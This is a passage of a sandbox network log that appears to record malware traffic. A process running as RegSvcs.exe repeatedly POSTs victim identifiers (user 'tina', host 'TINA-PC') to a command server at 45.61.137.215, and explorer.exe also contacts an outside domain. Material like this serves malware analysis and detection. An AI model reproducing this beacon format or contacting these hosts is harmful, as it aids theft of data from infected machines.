May 29, 2024 15:45:25.973412037 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.9	49790	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:26.168824911 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:26.173861027 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:28.730727911 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:26 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:28.730783939 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:28.730834961 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:28.730866909 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:28.730906963 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:28.730940104 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:28.730977058 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:45:28.731048107 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:45:28.731089115 CEST	1236	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)
May 29, 2024 15:45:28.731123924 CEST	1236	IN	Data Raw: 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 Data Ascii: --white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.9	49791	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:28.962608099 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:28.968564034 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:31.591363907 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:29 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:31.591384888 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:31.591393948 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:31.591415882 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:31.591425896 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:31.591510057 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:31.591519117 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:45:31.591530085 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:45:31.591747999 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:45:31.591768026 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.9	49792	101.36.116.238	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:30.851082087 CEST	169	OUT	GET /dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1 Host: www.top-dao.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.9	49793	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:31.801522970 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:31.806539059 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:34.409621000 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:32 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:34.409681082 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:34.409718037 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:34.409734964 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:34.409753084 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:34.409770012 CEST	1120	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:45:34.409789085 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
